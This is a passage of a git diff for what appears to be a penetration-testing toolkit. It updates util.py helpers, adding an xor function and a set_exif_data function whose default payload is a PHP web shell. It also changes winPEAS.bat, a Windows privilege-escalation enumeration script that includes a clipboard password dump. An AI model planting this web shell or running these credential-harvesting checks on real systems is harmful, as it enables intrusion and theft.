|
return paramiko_tunnel
|
||||||
|
|
||||||
# TODO: https://github.com/paramiko/paramiko/blob/88f35a537428e430f7f26eee8026715e357b55d6/demos/forward.py#L103
|
# TODO: https://github.com/paramiko/paramiko/blob/88f35a537428e430f7f26eee8026715e357b55d6/demos/forward.py#L103
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
0
uptux.py
Normal file → Executable file
0
uptux.py
Normal file → Executable file
47
util.py
47
util.py
@ -1,7 +1,9 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
import random
|
import random
|
||||||
|
import math
|
||||||
import socket
|
import socket
|
||||||
|
import itertools
|
||||||
import netifaces as ni
|
import netifaces as ni
|
||||||
import string
|
import string
|
||||||
import sys
|
import sys
|
||||||
@ -44,15 +46,20 @@ def exit_with_error(res, err):
|
|||||||
exit()
|
exit()
|
||||||
|
|
||||||
def assert_status_code(res, status_code, err=None):
|
def assert_status_code(res, status_code, err=None):
|
||||||
if res.status_code != status_code:
|
if type(status_code) == int and res.status_code != status_code:
|
||||||
err = f"[-] '{res.url}' returned unexpected status code {res.status_code}, expected: {status_code}" if err is None else err
|
err = f"[-] '{res.url}' returned unexpected status code {res.status_code}, expected: {status_code}" if err is None else err
|
||||||
exit_with_error(res, err)
|
exit_with_error(res, err)
|
||||||
|
elif hasattr(status_code, '__iter__') and res.status_code not in status_code:
|
||||||
|
err = f"[-] '{res.url}' returned unexpected status code {res.status_code}, expected one of: {','.join(status_code)}" if err is None else err
|
||||||
|
exit_with_error(res, err)
|
||||||
|
|
||||||
def assert_header_present(res, header, err=None):
|
def assert_location(res, location, err=None):
|
||||||
if header in res.headers:
|
assert_header_present(res, "Location")
|
||||||
|
location_header = res.headers["Location"].lower()
|
||||||
|
if location_header == location.lower():
|
||||||
return
|
return
|
||||||
|
|
||||||
err = f"[-] '{res.url}' did not return header: {header}" if err is None else err
|
err = f"[-] '{res.url}' returned unexpected location {location_header}, expected: {location}" if err is None else err
|
||||||
exit_with_error(res, err)
|
exit_with_error(res, err)
|
||||||
|
|
||||||
def assert_content_type(res, content_type, err=None):
|
def assert_content_type(res, content_type, err=None):
|
||||||
@ -66,6 +73,13 @@ def assert_content_type(res, content_type, err=None):
|
|||||||
err = f"[-] '{res.url}' returned unexpected content type {content_type_header}, expected: {content_type}" if err is None else err
|
err = f"[-] '{res.url}' returned unexpected content type {content_type_header}, expected: {content_type}" if err is None else err
|
||||||
exit_with_error(res, err)
|
exit_with_error(res, err)
|
||||||
|
|
||||||
|
def assert_header_present(res, header, err=None):
|
||||||
|
if header in res.headers:
|
||||||
|
return
|
||||||
|
|
||||||
|
err = f"[-] '{res.url}' did not return header: {header}" if err is None else err
|
||||||
|
exit_with_error(res, err)
|
||||||
|
|
||||||
def openServer(address, ports=None):
|
def openServer(address, ports=None):
|
||||||
listenPort = None
|
listenPort = None
|
||||||
retry = True
|
retry = True
|
||||||
@ -149,6 +163,29 @@ def pad(x, n):
|
|||||||
x += (n-(len(x)%n))*b"\x00"
|
x += (n-(len(x)%n))*b"\x00"
|
||||||
return x
|
return x
|
||||||
|
|
||||||
|
def xor(a, b):
|
||||||
|
if len(a) == 0 or len(b) == 0:
|
||||||
|
return a
|
||||||
|
|
||||||
|
if len(a) < len(b):
|
||||||
|
a *= int(math.ceil((len(b)/len(a))))
|
||||||
|
a = a[0:len(b)]
|
||||||
|
elif len(b) < len(a):
|
||||||
|
b *= int(math.ceil((len(a)/len(b))))
|
||||||
|
b = b[0:len(a)]
|
||||||
|
|
||||||
|
if type(a) == str and type(b) == str:
|
||||||
|
return "".join([chr(ord(c1) ^ ord(c2)) for (c1,c2) in zip(a, b) ])
|
||||||
|
else:
|
||||||
|
if type(a) != bytes:
|
||||||
|
a = a.encode()
|
||||||
|
if type(b) != bytes:
|
||||||
|
b = b.encode()
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
return b"".join([bytes([c1 ^ c2]) for (c1,c2) in zip(a, b) ])
|
||||||
|
|
||||||
def set_exif_data(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_tag=None):
|
def set_exif_data(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_tag=None):
|
||||||
import exif
|
import exif
|
||||||
|
|
||||||
|
BIN
win/chisel.exe
BIN
win/chisel.exe
Binary file not shown.
BIN
win/chisel64.exe
BIN
win/chisel64.exe
Binary file not shown.
@ -10,6 +10,14 @@ REM Registry scan of other drives besides
|
|||||||
REM /////true or false
|
REM /////true or false
|
||||||
SET long=false
|
SET long=false
|
||||||
|
|
||||||
|
REM Check if the current path contains spaces
|
||||||
|
SET "CurrentFolder=%~dp0"
|
||||||
|
IF "!CurrentFolder!" NEQ "!CurrentFolder: =!" (
|
||||||
|
ECHO winPEAS.bat cannot run if the current path contains spaces.
|
||||||
|
ECHO Exiting.
|
||||||
|
EXIT /B 1
|
||||||
|
)
|
||||||
|
|
||||||
:Splash
|
:Splash
|
||||||
ECHO.
|
ECHO.
|
||||||
CALL :ColorLine " %E%32m((,.,/((((((((((((((((((((/, */%E%97m"
|
CALL :ColorLine " %E%32m((,.,/((((((((((((((((((((/, */%E%97m"
|
||||||
@ -52,7 +60,7 @@ CALL :ColorLine " %E%41mUse it at your own networks and/or with the network ow
|
|||||||
ECHO.
|
ECHO.
|
||||||
|
|
||||||
:SystemInfo
|
:SystemInfo
|
||||||
CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO
|
CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO"
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS"
|
CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS"
|
||||||
ECHO. [i] Check for vulnerabilities for the OS version with the applied patches
|
ECHO. [i] Check for vulnerabilities for the OS version with the applied patches
|
||||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
|
||||||
@ -404,7 +412,7 @@ CALL :T_Progress 1
|
|||||||
|
|
||||||
:CurrentClipboard
|
:CurrentClipboard
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m CURRENT CLIPBOARD"
|
CALL :ColorLine " %E%33m[+]%E%97m CURRENT CLIPBOARD"
|
||||||
ECHO. [i] Any password inside the clipboard?
|
ECHO. [i] Any passwords inside the clipboard?
|
||||||
powershell -command "Get-Clipboard" 2>nul
|
powershell -command "Get-Clipboard" 2>nul
|
||||||
ECHO.
|
ECHO.
|
||||||
CALL :T_Progress 1
|
CALL :T_Progress 1
|
||||||
@ -565,7 +573,7 @@ CALL :T_Progress 2
|
|||||||
|
|
||||||
:AppCMD
|
:AppCMD
|
||||||
CALL :ColorLine " %E%33m[+]%E%97m AppCmd"
|
CALL :ColorLine " %E%33m[+]%E%97m AppCmd"
|
||||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd-exe
|
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
|
||||||
IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists.
|
IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists.
|
||||||
ECHO.
|
ECHO.
|
||||||
CALL :T_Progress 2
|
CALL :T_Progress 2
|
||||||
|
BIN
win/winPEAS.exe
BIN
win/winPEAS.exe
Binary file not shown.
Binary file not shown.
Loading…
Reference in New Issue
Block a user